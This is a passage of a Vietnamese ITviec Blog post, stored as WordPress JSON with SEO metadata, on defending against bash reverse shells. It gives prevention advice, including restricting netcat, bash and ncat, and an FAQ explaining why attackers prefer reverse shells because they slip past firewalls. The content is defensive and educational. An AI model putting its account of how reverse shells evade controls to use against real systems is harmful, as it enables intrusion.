\u0111i\u1ec1u khi\u1ec3n m\u00e1y n\u1ea1n nh\u00e2n v\u00e0 th\u1ef1c thi reverse shell. S\u1eed d\u1ee5ng c\u00e1c c\u00f4ng ngh\u1ec7 sandbox v\u00e0 containerization nh\u01b0 Docker \u0111\u1ec3 c\u00f4 l\u1eadp c\u00e1c \u1ee9ng d\u1ee5ng v\u00e0 gi\u1edbi h\u1ea1n t\u00e1c \u0111\u1ed9ng n\u1ebfu m\u1ed9t \u1ee9ng d\u1ee5ng b\u1ecb x\u00e2m nh\u1eadp.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Gi\u1edbi h\u1ea1n c\u00e1c c\u00f4ng c\u1ee5 c\u00f3 th\u1ec3 t\u1ea1o reverse shell<\/b><span style=\"font-weight: 400;\">: H\u1ea1n ch\u1ebf c\u00e1c c\u00f4ng c\u1ee5 c\u00f3 th\u1ec3 t\u1ea1o reverse shell (nh\u01b0 netcat, bash ho\u1eb7c ncat) c\u00f3 th\u1ec3 gi\u00fap gi\u1ea3m thi\u1ec3u kh\u1ea3 n\u0103ng k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng ch\u00fang. Tuy nhi\u00ean, v\u00ec reverse shell c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c th\u1ef1c hi\u1ec7n v\u1edbi nhi\u1ec1u c\u00f4ng c\u1ee5 kh\u00e1c nhau n\u00ean b\u1ea1n kh\u00f4ng th\u1ec3 lo\u1ea1i b\u1ecf ho\u00e0n to\u00e0n kh\u1ea3 n\u0103ng n\u00e0y m\u00e0 ch\u1ec9 c\u00f3 th\u1ec3 l\u00e0m kh\u00f3 kh\u0103n h\u01a1n cho k\u1ebb t\u1ea5n c\u00f4ng. S\u1eed d\u1ee5ng c\u00e1c gi\u1ea3i ph\u00e1p Application Control nh\u01b0 AppLocker tr\u00ean Windows ho\u1eb7c AppArmor\/SELinux tr\u00ean Linux \u0111\u1ec3 ki\u1ec3m so\u00e1t ch\u1eb7t ch\u1ebd vi\u1ec7c th\u1ef1c thi \u1ee9ng d\u1ee5ng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Ph\u00f2ng ch\u1ed1ng Phishing<\/b><span style=\"font-weight: 400;\">: Phishing l\u00e0 m\u1ed9t trong nh\u1eefng ph\u01b0\u01a1ng ph\u00e1p ph\u1ed5 bi\u1ebfn m\u00e0 k\u1ebb t\u1ea5n c\u00f4ng s\u1eed d\u1ee5ng \u0111\u1ec3 \u0111\u01b0a m\u00e3 \u0111\u1ed9c v\u00e0o m\u00e1y n\u1ea1n nh\u00e2n. \u0110\u00e0o t\u1ea1o nh\u00e2n vi\u00ean \u0111\u1ec3 nh\u1eadn di\u1ec7n email l\u1eeba \u0111\u1ea3o v\u00e0 tri\u1ec3n khai c\u00e1c c\u00f4ng c\u1ee5 b\u1ea3o m\u1eadt email c\u00f3 th\u1ec3 gi\u00fap ng\u0103n ch\u1eb7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng n\u00e0y.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>S\u1eed d\u1ee5ng Web Application Firewalls (WAF)<\/b><span style=\"font-weight: 400;\">: C\u00e1c WAF c\u00f3 th\u1ec3 gi\u00fap nh\u1eadn di\u1ec7n c\u00e1c m\u1eabu giao ti\u1ebfp t\u1eeb reverse shell v\u00e0 ng\u1eebng ch\u00fang ngay l\u1eadp t\u1ee9c. WAF l\u00e0 c\u00f4ng c\u1ee5 m\u1ea1nh m\u1ebd gi\u00fap b\u1ea3o v\u1ec7 c\u00e1c \u1ee9ng d\u1ee5ng web kh\u1ecfi c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng m\u1ea1ng bao g\u1ed3m c\u1ea3 reverse shell. C\u1ea5u h\u00ecnh WAF \u0111\u1ec3 ng\u0103n ch\u1eb7n c\u00e1c k\u1ef9 thu\u1eadt command injection ph\u1ed5 bi\u1ebfn v\u00e0 th\u01b0\u1eddng xuy\u00ean c\u1eadp nh\u1eadt c\u00e1c rule \u0111\u1ec3 \u0111\u1ed1i ph\u00f3 v\u1edbi c\u00e1c k\u1ef9 thu\u1eadt bypass m\u1edbi.<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"Cau_hoi_thuong_gap_ve_reverse_shell\"><\/span><b>C\u00e2u h\u1ecfi th\u01b0\u1eddng g\u1eb7p v\u1ec1 reverse shell<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>T\u1ea1i sao k\u1ebb t\u1ea5n c\u00f4ng l\u1ea1i d\u00f9ng reverse shell thay v\u00ec bind shell?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Reverse shell th\u01b0\u1eddng \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng thay v\u00ec bind shell v\u00ec n\u00f3 d\u1ec5 d\u00e0ng v\u01b0\u1ee3t qua c\u00e1c t\u01b0\u1eddng l\u1eeda v\u00e0 c\u1ea5u h\u00ecnh NAT. Trong bind shell, m\u00e1y n\u1ea1n nh\u00e2n s\u1ebd m\u1edf m\u1ed9t c\u1ed5ng v\u00e0 \u0111\u1ee3i k\u1ebft n\u1ed1i t\u1eeb k\u1ebb t\u1ea5n c\u00f4ng, \u0111i\u1ec1u n\u00e0y d\u1ec5 b\u1ecb c\u00e1c t\u01b0\u1eddng l\u1eeda ph\u00e1t hi\u1ec7n v\u00e0 ch\u1eb7n.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Trong khi \u0111\u00f3, v\u1edbi reverse shell, k\u1ebft n\u1ed1i \u0111\u01b0\u1ee3c th\u1ef1c hi\u1ec7n t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n ra m\u00e1y c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng, gi\u00fap tr\u00e1nh b\u1ecb ph\u00e1t hi\u1ec7n b\u1edfi c\u00e1c t\u01b0\u1eddng l\u1eeda do c\u00e1c k\u1ebft n\u1ed1i th\u01b0\u1eddng xuy\u00ean ch\u1ec9 \u0111\u01b0\u1ee3c ph\u00e9p xu\u1ea5t ra m\u00e0 kh\u00f4ng b\u1ecb gi\u00e1m s\u00e1t.<\/span><\/p>\n<h3><b>C\u00f3 th\u1ec3 ph\u00e1t hi\u1ec7n reverse shell trong h\u1ec7 th\u1ed1ng nh\u01b0 th\u1ebf n\u00e0o?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Ph\u00e1t hi\u1ec7n reverse shell trong h\u1ec7 th\u1ed1ng c\u00f3 th\u1ec3 kh\u00f3 kh\u0103n v\u00ec k\u1ebft n\u1ed1i c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c m\u00e3 h\u00f3a v\u00e0 s\u1eed d\u1ee5ng c\u00e1c c\u00f4ng c\u1ee5 kh\u00e1c nhau. Tuy nhi\u00ean v\u1eabn c\u00f3 m\u1ed9t s\u1ed1 c\u00e1ch nh\u01b0 theo d\u00f5i c\u00e1c k\u1ebft n\u1ed1i ra ngo\u00e0i h\u1ec7 th\u1ed1ng, ki\u1ec3m tra c\u00e1c t\u1ec7p tin l\u1ea1 ho\u1eb7c c\u00e1c l\u1ec7nh kh\u00f4ng x\u00e1c \u0111\u1ecbnh trong h\u1ec7 th\u1ed1ng.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Ngo\u00e0i ra, vi\u1ec7c s\u1eed d\u1ee5ng c\u00e1c c\u00f4ng c\u1ee5 gi\u00e1m s\u00e1t m\u1ea1ng v\u00e0 h\u1ec7 th\u1ed1ng nh\u01b0 IDS (H\u1ec7 th\u1ed1ng ph\u00e1t hi\u1ec7n x\u00e2m nh\u1eadp) ho\u1eb7c c\u00e1c t\u01b0\u1eddng l\u1eeda c\u00f3 th\u1ec3 gi\u00fap ph\u00e1t hi\u1ec7n c\u00e1c h\u00e0nh vi nghi ng\u1edd, ch\u1eb3ng h\u1ea1n nh\u01b0 k\u1ebft n\u1ed1i v\u1edbi \u0111\u1ecba ch\u1ec9 IP ngo\u00e0i t\u1ea7m ki\u1ec3m so\u00e1t.<\/span><\/p>\n<h3><b>Bash reverse shell c\u00f3 ho\u1ea1t \u0111\u1ed9ng tr\u00ean m\u1ecdi h\u1ec7 th\u1ed1ng kh\u00f4ng?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Bash reverse shell ho\u1ea1t \u0111\u1ed9ng t\u1ed1t tr\u00ean h\u1ea7u h\u1ebft c\u00e1c h\u1ec7 th\u1ed1ng Unix-like, bao g\u1ed3m c\u00e1c b\u1ea3n ph\u00e2n ph\u1ed1i Linux v\u00e0 macOS, v\u00ec Bash th\u01b0\u1eddng \u0111\u01b0\u1ee3c c\u00e0i s\u1eb5n tr\u00ean c\u00e1c h\u1ec7 \u0111i\u1ec1u h\u00e0nh n\u00e0y.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Tuy nhi\u00ean, tr\u00ean c\u00e1c h\u1ec7 th\u1ed1ng Windows, vi\u1ec7c s\u1eed d\u1ee5ng Bash reverse shell y\u00eau c\u1ea7u ph\u1ea7n m\u1ec1m nh\u01b0 Windows Subsystem for Linux (WSL) ho\u1eb7c c\u00e1c c\u00f4ng c\u1ee5 t\u01b0\u01a1ng t\u1ef1 \u0111\u1ec3 m\u00f4 ph\u1ecfng m\u00f4i tr\u01b0\u1eddng Linux. Do \u0111\u00f3, m\u1eb7c d\u00f9 Bash reverse shell ph\u1ed5 bi\u1ebfn v\u00e0 hi\u1ec7u qu\u1ea3 tr\u00ean c\u00e1c h\u1ec7 \u0111i\u1ec1u h\u00e0nh Unix, n\u00f3 kh\u00f4ng ho\u00e0n to\u00e0n ho\u1ea1t \u0111\u1ed9ng tr\u00ean m\u1ecdi h\u1ec7 th\u1ed1ng m\u00e0 kh\u00f4ng c\u00f3 s\u1ef1 h\u1ed7 tr\u1ee3 \u0111\u1eb7c bi\u1ec7t.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Tong_ket\"><\/span><b>T\u1ed5ng k\u1ebft<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">T\u00f3m l\u1ea1i, c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng reverse shell \u0111\u00e3 v\u00e0 \u0111ang x\u1ea3y ra tr\u00ean nhi\u1ec1u n\u1ec1n t\u1ea3ng v\u00e0 qua c\u00e1c ph\u01b0\u01a1ng th\u1ee9c kh\u00e1c nhau. T\u1eeb vi\u1ec7c khai th\u00e1c c\u00e1c l\u1ed7 h\u1ed5ng trong c\u00e1c d\u1ecbch v\u1ee5 \u0111\u00e1m m\u00e2y l\u1edbn nh\u01b0 Alibaba v\u00e0 IBM cho \u0111\u1ebfn l\u1eeba \u0111\u1ea3o ng\u01b0\u1eddi d\u00f9ng qua c\u00e1c g\u00f3i ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i tr\u00ean npm, t\u1ea5t c\u1ea3 \u0111\u1ec1u ch\u1ee9ng minh s\u1ef1 \u0111a d\u1ea1ng v\u00e0 nguy hi\u1ec3m c\u1ee7a c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng n\u00e0y.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">ITviec hy v\u1ecdng b\u00e0i vi\u1ebft tr\u00ean \u0111\u00e3 cung c\u1ea5p cho b\u1ea1n c\u00e1i nh\u00ecn t\u1ed5ng quan v\u00e0 t\u1ea7m quan tr\u1ecdng c\u1ee7a vi\u1ec7c ph\u00f2ng ng\u1eeba c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng reverse shell c\u0169ng nh\u01b0 bash reverse shell. C\u00e1c t\u1ed5 ch\u1ee9c c\u1ea7n ch\u1ee7 \u0111\u1ed9ng b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng c\u1ee7a m\u00ecnh b\u1eb1ng c\u00e1ch th\u01b0\u1eddng xuy\u00ean ki\u1ec3m tra l\u1ed7 h\u1ed5ng, \u00e1p d\u1ee5ng c\u00e1c bi\u1ec7n ph\u00e1p b\u1ea3o m\u1eadt m\u1ea1nh m\u1ebd v\u00e0 \u0111\u00e0o t\u1ea1o nh\u00e2n vi\u00ean \u0111\u1ec3 nh\u1eadn di\u1ec7n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng. \u0110\u1ed1i v\u1edbi c\u00e1 nh\u00e2n, vi\u1ec7c trang b\u1ecb ki\u1ebfn th\u1ee9c v\u1eefng v\u00e0ng v\u1ec1 reverse shell, c\u0169ng nh\u01b0 hi\u1ec3u r\u00f5 c\u00e1c ph\u01b0\u01a1ng th\u1ee9c ph\u00f2ng ng\u1eeba v\u00e0 ph\u00e1t hi\u1ec7n t\u1ea5n c\u00f4ng \u0111\u00f3ng vai tr\u00f2 h\u1ebft s\u1ee9c quan tr\u1ecdng trong vi\u1ec7c b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng v\u00e0 d\u1eef li\u1ec7u.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Reverse shell l\u00e0 m\u1ed9t trong nh\u1eefng c\u00f4ng c\u1ee5 ph\u1ed5 bi\u1ebfn m\u00e0 c\u00e1c tin t\u1eb7c s\u1eed d\u1ee5ng \u0111\u1ec3 x\u00e2m nh\u1eadp v\u00e0 chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau. V\u1edbi nh\u1eefng \u0111\u1eb7c \u0111i\u1ec3m tinh vi v\u00e0 kh\u1ea3 n\u0103ng v\u01b0\u1ee3t qua c\u00e1c c\u01a1 ch\u1ebf b\u1ea3o m\u1eadt, reverse shell tr\u1edf th\u00e0nh m\u1ed9t th\u00e1ch th\u1ee9c l\u1edbn \u0111\u1ed1i v\u1edbi vi\u1ec7c [&hellip;]<\/p>\n","protected":false},"author":209,"featured_media":87362,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_gspb_post_css":"","footnotes":""},"categories":[109],"tags":[],"class_list":["post-86370","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-chuyen-mon-it"],"blocksy_meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.8 (Yoast SEO v27.8) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3 - ITviec Blog<\/title>\n<meta name=\"description\" content=\"T\u00ecm hi\u1ec3u c\u00e1ch tin t\u1eb7c d\u00f9ng reverse shell, c\u00e1c v\u00ed d\u1ee5 (nh\u01b0 bash reverse shell), c\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng \u0111\u1ec3 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng t\u1ed1t nh\u1ea5t.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/\" \/>\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3\" \/>\n<meta property=\"og:description\" content=\"Reverse shell l\u00e0 m\u1ed9t trong nh\u1eefng c\u00f4ng c\u1ee5 ph\u1ed5 bi\u1ebfn m\u00e0 c\u00e1c tin t\u1eb7c s\u1eed d\u1ee5ng \u0111\u1ec3 x\u00e2m nh\u1eadp v\u00e0 chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau. V\u1edbi nh\u1eefng \u0111\u1eb7c \u0111i\u1ec3m tinh\" \/>\n<meta property=\"og:url\" content=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/\" \/>\n<meta property=\"og:site_name\" content=\"ITviec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ITviec\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-26T11:30:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-04-26T11:32:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png\" \/>\n\t<meta property=\"og:image:width\" content=\"640\" \/>\n\t<meta property=\"og:image:height\" content=\"337\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"M\u1ef9 Duy\u00ean\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ITviec\" \/>\n<meta name=\"twitter:site\" content=\"@ITviec\" \/>\n<meta name=\"twitter:label1\" content=\"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi\" \/>\n\t<meta name=\"twitter:data1\" content=\"M\u1ef9 Duy\u00ean\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc\" \/>\n\t<meta name=\"twitter:data2\" content=\"21 ph\u00fat\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3 - ITviec Blog","description":"T\u00ecm hi\u1ec3u c\u00e1ch tin t\u1eb7c d\u00f9ng reverse shell, c\u00e1c v\u00ed d\u1ee5 (nh\u01b0 bash reverse shell), c\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng \u0111\u1ec3 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng t\u1ed1t nh\u1ea5t.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","og_locale":"vi_VN","og_type":"article","og_title":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3","og_description":"Reverse shell l\u00e0 m\u1ed9t trong nh\u1eefng c\u00f4ng c\u1ee5 ph\u1ed5 bi\u1ebfn m\u00e0 c\u00e1c tin t\u1eb7c s\u1eed d\u1ee5ng \u0111\u1ec3 x\u00e2m nh\u1eadp v\u00e0 chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau. V\u1edbi nh\u1eefng \u0111\u1eb7c \u0111i\u1ec3m tinh","og_url":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","og_site_name":"ITviec Blog","article_publisher":"https:\/\/www.facebook.com\/ITviec","article_published_time":"2025-04-26T11:30:12+00:00","article_modified_time":"2025-04-26T11:32:35+00:00","og_image":[{"width":640,"height":337,"url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","type":"image\/png"}],"author":"M\u1ef9 Duy\u00ean","twitter_card":"summary_large_image","twitter_creator":"@ITviec","twitter_site":"@ITviec","twitter_misc":{"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi":"M\u1ef9 Duy\u00ean","\u01af\u1edbc t\u00ednh th\u1eddi gian \u0111\u1ecdc":"21 ph\u00fat"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#article","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/"},"author":{"name":"M\u1ef9 Duy\u00ean","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7"},"headline":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3","datePublished":"2025-04-26T11:30:12+00:00","dateModified":"2025-04-26T11:32:35+00:00","mainEntityOfPage":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/"},"wordCount":5733,"publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"image":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","articleSection":["Chuy\u00ean m\u00f4n IT"],"inLanguage":"vi"},{"@type":"WebPage","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","url":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","name":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3 - ITviec Blog","isPartOf":{"@id":"https:\/\/itviec.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage"},"image":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage"},"thumbnailUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","datePublished":"2025-04-26T11:30:12+00:00","dateModified":"2025-04-26T11:32:35+00:00","description":"T\u00ecm hi\u1ec3u c\u00e1ch tin t\u1eb7c d\u00f9ng reverse shell, c\u00e1c v\u00ed d\u1ee5 (nh\u01b0 bash reverse shell), c\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng \u0111\u1ec3 b\u1ea3o v\u1ec7 h\u1ec7 th\u1ed1ng t\u1ed1t nh\u1ea5t.","breadcrumb":{"@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#breadcrumb"},"inLanguage":"vi","potentialAction":[{"@type":"ReadAction","target":["https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/"]}]},{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#primaryimage","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png","width":640,"height":337,"caption":"Bash reverse shell - itviec blog"},{"@type":"BreadcrumbList","@id":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Chuy\u00ean m\u00f4n IT","item":"https:\/\/itviec.com\/blog\/chuyen-mon-it\/"},{"@type":"ListItem","position":2,"name":"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3"}]},{"@type":"WebSite","@id":"https:\/\/itviec.com\/blog\/#website","url":"https:\/\/itviec.com\/blog\/","name":"ITviec Blog","description":"IT Jobs &amp; People in Vietnam","publisher":{"@id":"https:\/\/itviec.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/itviec.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"vi"},{"@type":"Organization","@id":"https:\/\/itviec.com\/blog\/#organization","name":"ITviec","url":"https:\/\/itviec.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2018\/12\/itviec-black-square-facebook.png","width":1800,"height":1800,"caption":"ITviec"},"image":{"@id":"https:\/\/itviec.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/ITviec","https:\/\/x.com\/ITviec","https:\/\/www.linkedin.com\/company\/itviec","https:\/\/www.youtube.com\/channel\/UCYthAQ3bcGr57M_ag5gHDvQ"]},{"@type":"Person","@id":"https:\/\/itviec.com\/blog\/#\/schema\/person\/73733c0725c7e39e696a896bd1abe2d7","name":"M\u1ef9 Duy\u00ean","image":{"@type":"ImageObject","inLanguage":"vi","@id":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","url":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","contentUrl":"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2024\/03\/Author_Duyen-Tran-120x120.jpg","caption":"M\u1ef9 Duy\u00ean"},"url":"https:\/\/itviec.com\/blog\/author\/my-duyen\/"}]}},"_links":{"self":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/86370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/users\/209"}],"replies":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/comments?post=86370"}],"version-history":[{"count":0,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/posts\/86370\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media\/87362"}],"wp:attachment":[{"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/media?parent=86370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/categories?post=86370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/itviec.com\/blog\/wp-json\/wp\/v2\/tags?post=86370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}